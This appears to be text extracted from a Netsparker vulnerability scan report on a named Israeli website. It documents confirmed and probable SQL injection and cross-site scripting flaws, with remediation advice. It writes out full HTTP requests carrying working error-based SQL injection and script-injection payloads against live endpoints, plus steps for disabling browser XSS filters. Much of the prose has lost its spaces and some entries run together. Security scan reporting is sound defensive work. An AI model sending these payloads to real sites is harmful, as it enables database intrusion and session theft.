Thisisanextremelycommonvulnerabilityanditssuccessfulexploitationcanhavecriticalimplications.

{PRODUCT}confirmedthevulnerabilitybyexecutingatestSQLqueryonthebackenddatabase.

ImpactDependingonthebackenddatabase,thedatabaseconnectionsettingsandtheoperatingsystem,anattackercanmountoneormoreofthefollowingtypeofattackssuccessfully:

Reading,updatinganddeletingarbitrarydataortablesfromthedatabaseExecutingcommandsontheunderlyingoperatingsystem

Actions to Take1. Seetheremedyforsolution.2. Ifyouarenotusingadatabaseaccesslayer(DAL),considerusingone.Thiswillhelpyoucentralizetheissue.YoucanalsouseORM(object relational

mapping).MostoftheORMsystemsuseonlyparameterizedqueriesandthiscansolvethewholeSQLinjectionproblem.3. LocateallofthedynamicallygeneratedSQLqueriesandconvertthemtoparameterizedqueries.(If you decide to use a DAL/ORM, change all legacy

code to use these new libraries.)4. Useyourweblogsandapplicationlogstoseeiftherewereanypreviousbutundetectedattackstothisresource.

RemedyArobustmethodformitigatingthethreatofSQLinjection-basedvulnerabilitiesistouseparameterizedqueries(prepared statements).Almostallmodernlanguagesprovidebuilt-inlibrariesforthis.Whereverpossible,donotcreatedynamicSQLqueriesorSQLquerieswithstringconcatenation.

Required Skills for Successful ExploitationTherearenumerousfreelyavailabletoolstoexploitSQLinjectionvulnerabilities.Thisisacomplexareawithmanydependencies;however,itshouldbenotedthatthenumerousresourcesavailableinthisareahaveraisedbothattackerawarenessoftheissuesandtheirabilitytodiscoverandleveragethem.SQLinjectionisoneofthemostcommonwebapplicationvulnerabilities.

External ReferencesOWASPSQLinjectionSQLinjectionCheatsheet

Remedy ReferencesMSDN-ProtectFromSQLinjectioninASP.NET

ClassificationOWASPA1PCIv1.2-6.5.2PCIv2.0-6.5.1CWE-89CAPEC-66WASC-19

1.1. /contact/ CONFIRMEDhttp://www.shalomlaam.co.il/contact/

ParametersParameter Type Value

action POST contact

f_name POST Smith

mail POST

message POST 3

name POST Smith

name_id POST convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)))

phone POST 3

sendFrom POST 3

subject POST 3

11 / 146

Extracted Datamicrosoft sql server 2005 - 9.00.3042.00 (intel x86) feb 9 2007 22:47:07 copyright (c) 1988-2005 microsoft corporation express edition onwindows nt 5.2 (build 3790: service pack 2)

RequestPOST /contact/ HTTP/1.1Referer: http://www.shalomlaam.co.il/contact/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Content-Type: application/x-www-form-urlencodedHost: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAContent-Length: 258Accept-Encoding: gzip, deflate

action=contact&f_name=Smith&mail=%ef%bf%bd%ef%bf%bd%ef%bf%bd&message=3&name=Smith&name_id=convert(int,(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97)))&phone=3&sendFrom=3&subject=3

Response"Arial" size=2>Microsoft OLE DB Provider for SQL Server error '80040e07'Conversion failed when converting thevarchar value '_!@2dilemma' to data type int./contact/Default.asp, line 46

12 / 146

9 TOTALCRITICAL

2. [Probable] SQL InjectionSQLInjectionoccurswhendatainputforexamplebyauserisinterpretedasaSQLcommandratherthannormaldatabythebackenddatabase.Thisisanextremelycommonvulnerabilityanditssuccessfulexploitationcanhavecriticalimplications.EventhoughNetsparkerbelievesthatthereisaSQLInjectioninhereitcould not confirmit.TherecanbenumerousreasonsforNetsparkernotbeingabletoconfirmthis.WestronglyrecommendinvestigatingtheissuemanuallytoensurethatitisanSQLInjectionandthatitneedstobeaddressed.Youcanalsoconsidersendingthedetailsofthisissuetous,inorderthatwecanaddressthisissueforthenexttimeandgiveyouamorepreciseresult.

{PRODUCT}identifiedaprobableSQLinjection,whichoccurswhendatainputbyauserisinterpretedasanSQLcommandratherthanasnormaldatabythebackenddatabase.

Thisisanextremelycommonvulnerabilityanditssuccessfulexploitationcanhavecriticalimplications.

Eventhough{PRODUCT}believesthereisaSQLinjectioninhere,itcould not confirmit.Therecanbenumerousreasonsfor{PRODUCT}notbeingabletoconfirmthis.WestronglyrecommendinvestigatingtheissuemanuallytoensureitisanSQLinjectionandthatitneedstobeaddressed.Youcanalsoconsidersendingthedetailsofthisissuetoussowecanaddressthisissueforthenexttimeandgiveyouamorepreciseresult.

ImpactDependingonthebackenddatabase,databaseconnectionsettingsandtheoperatingsystem,anattackercanmountoneormoreofthefollowingtypeofattackssuccessfully:

Reading,updatinganddeletingarbitrarydata/tablesfromthedatabase.Executingcommandsontheunderlyingoperatingsystem.

Actions to Take1. Seetheremedyforsolution.2. Ifyouarenotusingadatabaseaccesslayer(DAL)withinthearchitectureconsideritsbenefitsandimplementifappropriate.Asaminimumtheuseof

sDALwillhelpcentralizetheissueanditsresolution.YoucanalsouseORM(object relational mapping).MostORMsystemsuseparameterizedqueriesandthiscansolvemanyifnotallSQLinjectionbasedproblems.

3. LocateallofthedynamicallygeneratedSQLqueriesandconvertthemtoparameterizedqueries.(If you decide to use a DAL/ORM, change all legacycode to use these new libraries.)

4. Monitorandreviewweblogsandapplicationlogstouncoveractiveorpreviousexploitationattempts.

RemedyAveryrobustmethodformitigatingthethreatofSQLinjection-basedvulnerabilitiesistouseparameterizedqueries(prepared statements).Almostallmodernlanguagesprovidebuilt-inlibrariesforthis.Whereverpossible,donotcreatedynamicSQLqueriesorSQLquerieswithstringconcatenation.

Required Skills for Successful ExploitationTherearenumerousfreelyavailabletoolstotestforSQLinjectionvulnerabilities.Thisisacomplexareawithmanydependencies;however,itshouldbenotedthatthenumerousresourcesavailableinthisareahaveraisedbothattackerawarenessoftheissuesandtheirabilitytodiscoverandleveragethem.SQLinjectionisoneofthemostcommonwebapplicationvulnerabilities.

External ReferencesOWASPSQLinjectionSQLinjectionCheatSheet

Remedy ReferencesSQLinjectionPreventionCheatSheetMSDN-ProtectFromSQLinjectioninASP.NETOWASPPreventingSQLinjectioninJavaPreparedStatementsandStoredProceduresinPHP

ClassificationOWASPA1PCIv1.2-6.5.2PCIv2.0-6.5.1CWE-89CAPEC-66WASC-19

13 / 146

2.1. /contact/http://www.shalomlaam.co.il/contact/

ParametersParameter Type Value

action POST contact

f_name POST Smith

mail POST

message POST 3

name POST Smith

name_id POST 0

phone POST 3

sendFrom POST -1 or 1=1 and (select 1 and row(1,1)>(selectcount(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))xfrom (select 1 union select 2)a group by xlimit 1))

subject POST 3

Certainty

RequestPOST /contact/ HTTP/1.1Referer: http://www.shalomlaam.co.il/contact/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Content-Type: application/x-www-form-urlencodedHost: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAContent-Length: 438Accept-Encoding: gzip, deflate

action=contact&f_name=Smith&mail=%ef%bf%bd%ef%bf%bd%ef%bf%bd&message=3&name=Smith&name_id=0&phone=3&sendFrom=-1%20or%201%3d1%20and%20(select%201%20and%20row(1%2c1)%3e(select%20count(*)%2cconcat(CONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97))%2c0x3a%2cfloor(rand()*2))x%20from%20(select%201%20union%20select%202)a%20group%20by%20x%20limit%201))&subject=3

Responsesrc="pic/logo.jpg" width="130" height="130" alt="" />-->

Microsoft OLE DB Provider for SQL Server error '80040e57'String or binary data would betruncated./contact/Default.asp, line 46

2.2. /contact/http://www.shalomlaam.co.il/contact/

ParametersParameter Type Value

action POST contact

f_name POST Smith

mail POST

message POST 3

name POST -1 or 1=1 and (select 1 and row(1,1)>(selectcount(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))xfrom (select 1 union select 2)a group by xlimit 1))

name_id POST 0

phone POST 3

sendFrom POST 3

subject POST 3

Certainty

RequestPOST /contact/ HTTP/1.1Referer: http://www.shalomlaam.co.il/contact/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Content-Type: application/x-www-form-urlencodedHost: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAContent-Length: 434Accept-Encoding: gzip, deflate

action=contact&f_name=Smith&mail=%ef%bf%bd%ef%bf%bd%ef%bf%bd&message=3&name=-1%20or%201%3d1%20and%20(select%201%20and%20row(1%2c1)%3e(select%20count(*)%2cconcat(CONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97))%2c0x3a%2cfloor(rand()*2))x%20from%20(select%201%20union%20select%202)a%20group%20by%20x%20limit%201))&name_id=0&phone=3&sendFrom=3&subject=3

Responsesrc="pic/logo.jpg" width="130" height="130" alt="" />-->

Microsoft OLE DB Provider for SQL Server error '80040e57'String or binary data would betruncated./contact/Default.asp, line 46

2.3. /contact/http://www.shalomlaam.co.il/contact/

ParametersParameter Type Value

action POST contact

f_name POST Smith

mail POST

message POST 3

name POST Smith

name_id POST 0

phone POST (selectconvert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns)

sendFrom POST 3

subject POST 3

Certainty

RequestPOST /contact/ HTTP/1.1Referer: http://www.shalomlaam.co.il/contact/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Content-Type: application/x-www-form-urlencodedHost: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAContent-Length: 289Accept-Encoding: gzip, deflate

action=contact&f_name=Smith&mail=%ef%bf%bd%ef%bf%bd%ef%bf%bd&message=3&name=Smith&name_id=0&phone=(select%20convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))%20FROM%20syscolumns)&sendFrom=3&subject=3

Responsesrc="pic/logo.jpg" width="130" height="130" alt="" />-->

Microsoft OLE DB Provider for SQL Server error '80040e57'String or binary data would betruncated./contact/Default.asp, line 46

2.4. /contact/http://www.shalomlaam.co.il/contact/

ParametersParameter Type Value

action POST contact

f_name POST Smith

mail POST

message POST 3

name POST Smith

name_id POST 0

phone POST 3

sendFrom POST 3

subject POST -1 or 1=1 and (select 1 and row(1,1)>(selectcount(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))xfrom (select 1 union select 2)a group by xlimit 1))

Certainty

RequestPOST /contact/ HTTP/1.1Referer: http://www.shalomlaam.co.il/contact/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Content-Type: application/x-www-form-urlencodedHost: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAContent-Length: 438Accept-Encoding: gzip, deflate

action=contact&f_name=Smith&mail=%ef%bf%bd%ef%bf%bd%ef%bf%bd&message=3&name=Smith&name_id=0&phone=3&sendFrom=3&subject=-1%20or%201%3d1%20and%20(select%201%20and%20row(1%2c1)%3e(select%20count(*)%2cconcat(CONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97))%2c0x3a%2cfloor(rand()*2))x%20from%20(select%201%20union%20select%202)a%20group%20by%20x%20limit%201))

Responsesrc="pic/logo.jpg" width="130" height="130" alt="" />-->

Microsoft OLE DB Provider for SQL Server error '80040e57'String or binary data would betruncated./contact/Default.asp, line 46

2.5. /reg/http://www.shalomlaam.co.il/reg/

ParametersParameter Type Value

action POST add

bpdf POST 1

btn1 POST

email POST (selectconvert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns)

f_name POST Smith

name POST Smith

phone POST 3

radio POST alon

Certainty

RequestPOST /reg/ HTTP/1.1Referer: http://www.shalomlaam.co.il/reg/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Content-Type: application/x-www-form-urlencodedHost: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAContent-Length: 270Accept-Encoding: gzip, deflate

action=add&bpdf=1&btn1=%ef%bf%bd%ef%bf%bd%ef%bf%bd&email=(select%20convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))%20FROM%20syscolumns)&f_name=Smith&name=Smith&phone=3&radio=alon

Responseyle="background:url('images/kiv.gif') repeat-x; width:100%; height:2px;">

Microsoft OLE DB Provider for SQL Server error '80040e57'String or binary data would betruncated./reg/Default.asp, line 28

2.6. /contact/http://www.shalomlaam.co.il/contact/

ParametersParameter Type Value

action POST contact

f_name POST -1 or 1=1 and (select 1 and row(1,1)>(selectcount(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))xfrom (select 1 union select 2)a group by xlimit 1))

mail POST

message POST 3

name POST Smith

name_id POST 0

phone POST 3

sendFrom POST 3

subject POST 3

18 / 146

Certainty

RequestPOST /contact/ HTTP/1.1Referer: http://www.shalomlaam.co.il/contact/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Content-Type: application/x-www-form-urlencodedHost: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAContent-Length: 434Accept-Encoding: gzip, deflate

action=contact&f_name=-1%20or%201%3d1%20and%20(select%201%20and%20row(1%2c1)%3e(select%20count(*)%2cconcat(CONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97))%2c0x3a%2cfloor(rand()*2))x%20from%20(select%201%20union%20select%202)a%20group%20by%20x%20limit%201))&mail=%ef%bf%bd%ef%bf%bd%ef%bf%bd&message=3&name=Smith&name_id=0&phone=3&sendFrom=3&subject=3

Responsesrc="pic/logo.jpg" width="130" height="130" alt="" />-->

Microsoft OLE DB Provider for SQL Server error '80040e57'String or binary data would betruncated./contact/Default.asp, line 46-->

Microsoft OLE DB Provider for SQL Server error '80040e14'Incorrect syntax near '27'./contact/Default.asp, line 46

19 / 146

2.8. /lessons/http://www.shalomlaam.co.il/lessons/

ParametersParameter Type Value

action POST search

yom POST '+ (selectconvert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'

snif POST 3

subjects POST 0

Certainty

RequestPOST /lessons/ HTTP/1.1Referer: http://www.shalomlaam.co.il/lessons/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Content-Type: application/x-www-form-urlencodedHost: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAContent-Length: 220Accept-Encoding: gzip, deflate

action=search&yom='%2b%20(select%20convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))%20FROM%20syscolumns)%20%2b'&snif=3&subjects=0

Responsetd>

Microsoft OLE DB Provider for ODBC Drivers error '80040e37'[Microsoft][ODBC Excel Driver]The Microsoft Jet database engine could not find the object 'syscolumns'. Make s

2.9. /lessons/default.asphttp://www.shalomlaam.co.il/lessons/default.asp

ParametersParameter Type Value

action POST search

yom POST '+ (selectconvert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'

snif POST 3

subjects POST 0

Certainty

RequestPOST /lessons/default.asp HTTP/1.1Referer: http://www.shalomlaam.co.il/lessons/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Content-Type: application/x-www-form-urlencodedHost: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAContent-Length: 220Accept-Encoding: gzip, deflate

action=search&yom='%2b%20(select%20convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))%20FROM%20syscolumns)%20%2b'&snif=3&subjects=0

20 / 146

Responsetd>

Microsoft OLE DB Provider for ODBC Drivers error '80040e37'[Microsoft][ODBC Excel Driver]The Microsoft Jet database engine could not find the object 'syscolumns'. Make s

21 / 146

150 TOTALIMPORTANTCONFIRMED

150

3. Cross-site ScriptingXSS(Cross-siteScripting)allowsanattackertoexecuteadynamicscript(Javascript, VbScript)inthecontextoftheapplication.Thisallowsseveraldifferentattackopportunities,mostlyhijackingthecurrentsessionoftheuserorchangingthelookofthepagebychangingtheHTMLontheflytostealtheuser'scredentials.ThishappensbecausetheinputenteredbyauserhasbeeninterpretedasHTML/Javascript/VbScriptbythebrowser.

XSStargetstheusersoftheapplicationinsteadoftheserver.Althoughthisisalimitation,sinceitallowsattackerstohijackotherusers'session,anattackermightattackanadministratortogainfullcontrolovertheapplication.

{PRODUCT}detectedcross-sitescripting,whichallowsanattackertoexecuteadynamicscript(JavaScript, VBScript)inthecontextoftheapplication.

Thisallowsseveraldifferentattackopportunities,mostlyhijackingthecurrentsessionoftheuserorchangingthelookofthepagebychangingtheHTMLontheflytostealtheuser'scredentials.ThishappensbecausetheinputenteredbyauserhasbeeninterpretedasHTML/JavaScript/VBScriptbythebrowser.Cross-sitescriptingtargetstheusersoftheapplicationinsteadoftheserver.Althoughthisisalimitation,sinceitallowsattackerstohijackotherusers'sessions,anattackermightattackanadministratortogainfullcontrolovertheapplication.

ImpactTherearemanydifferentattacksthatcanbeleveragedthroughtheuseofcross-sitescripting,including:

Hijackinguser'sactivesession.Mountingphishingattacks.Interceptingdataandperformingman-in-the-middleattacks.

RemedyTheissueoccursbecausethebrowserinterpretstheinputasactiveHTML,JavaScriptorVBScript.Toavoidthis,outputshouldbeencodedaccordingtotheoutputlocationandcontext.Forexample,iftheoutputgoesintoaJavaScriptblockwithintheHTMLdocument,thenoutputneedstobeencodedaccordingly.Encodingcangetverycomplex,thereforeit'sstronglyrecommendedtouseanencodinglibrarysuchasOWASPESAPIandMicrosoftAnti-cross-sitescripting.

Remedy ReferencesMicrosoftAnti-XSSLibraryOWASPXSSPreventionCheatSheetOWASPAntiSamyJava

External ReferencesXSSCheatSheetOWASP-cross-sitescriptingXSSShellXSSTunnelling

Proof of Concept NotesGeneratedXSSexploitmightnotworkduetobrowserXSSfiltering.PleasefollowtheguidelinesbelowinordertodisableXSSfilteringfordifferentbrowsers.Alsonotethat;

XSSfilteringisafeaturethat'senabledbydefaultinsomeofthemodernbrowsers.Itshouldonlybedisabledtemporarilytotestexploitsandshouldberevertedbackifthebrowserisactivelyusedotherthantestingpurposes.EventhoughbrowsershavecertaincheckstopreventCross-sitescriptingattacksinpracticethereareavarietyofwaystobypassthismechanismthereforeawebapplicationshouldnotrelyonthiskindofclient-sidebrowserchecks.

Chrome

Opencommandprompt.Gotofolderwherechrome.exeislocated.Runthecommandchrome.exe --args --disable-xss-auditor

InternetExplorer

ClickTools->InternetOptionsandthennavigatetotheSecurityTab.ClickCustomlevelandscrolltowardsthebottomwhereyouwillfindthatEnableXSSfilteriscurrentlyEnabled.Setittodisabled.ClickOK.ClickYestoacceptthewarningfollowedbyApply.

Firefox

Gotoabout:configintheURLaddressbar.Inthesearchfield,typeurlbar.filterandfindbrowser.urlbar.filter.javascript.Setitsvaluetofalsebydoubleclickingtherow.

ClassificationOWASPA2PCIv1.2-6.5.1PCIv2.0-6.5.7CWE-79CAPEC-19WASC-08

22 / 146

3.1. /allvideo/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001D1)%3C/script%3ECONFIRMEDhttp://www.shalomlaam.co.il/allvideo/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001D1)%3..

ParametersParameter Type Value

URI-BASED Full URL '"-->alert(0x0001D1)

RequestGET /allvideo/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001D1)%3C/script%3E HTTP/1.1Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate

ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 13:48:00 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 169Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT

404;http://www.shalomlaam.co.il:80/allvideo/'"-->netsparker(0x0001D1)script>style>alert(0x00049B)

23 / 146

RequestPOST /contact/reg/maillingUpdate.asp?'"-->netsparker(0x00049B) HTTP/1.1Referer: http://www.shalomlaam.co.il/contact/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Content-Type: application/x-www-form-urlencodedHost: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAContent-Length: 37Accept-Encoding: gzip, deflate

emailtonews=netsparker%40example.com&

ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 14:03:14 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 191Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT

404;http://www.shalomlaam.co.il:80/contact/reg/maillingUpdate.asp?'"-->netsparker(0x00049B)script>style>

ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 13:47:53 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 169Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT

404;http://www.shalomlaam.co.il:80/bmidrash/'"-->netsparker(0x0001C7)script>style>netsparker(0x0001CE)script>style>

3.8. /news'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001B7)%3C/script%3ECONFIRMEDhttp://www.shalomlaam.co.il/news'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001B7)%3C/scr..

ParametersParameter Type Value

URI-BASED Full URL '"-->alert(0x0001B7)

RequestGET /news'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001B7)%3C/script%3E HTTP/1.1Referer: http://www.shalomlaam.co.il/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate

ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 13:47:29 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 164Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT

404;http://www.shalomlaam.co.il:80/news'"-->netsparker(0x0001B7)script>style>

3.10. /js/delate_image.asp CONFIRMEDhttp://www.shalomlaam.co.il/js/delate_image.asp?'"-->alert(0x0003D6)

ParametersParameter Type Value

field GET picture_

Query Based Query String '"-->alert(0x0003D6)

RequestGET /js/delate_image.asp?'"-->netsparker(0x0003D6) HTTP/1.1Referer: http://www.shalomlaam.co.il/js/func_site.jsAccept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate

ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 14:00:30 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 180Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT

404;http://www.shalomlaam.co.il:80/js/delate_image.asp?'"-->netsparker(0x0003D6)script>style>

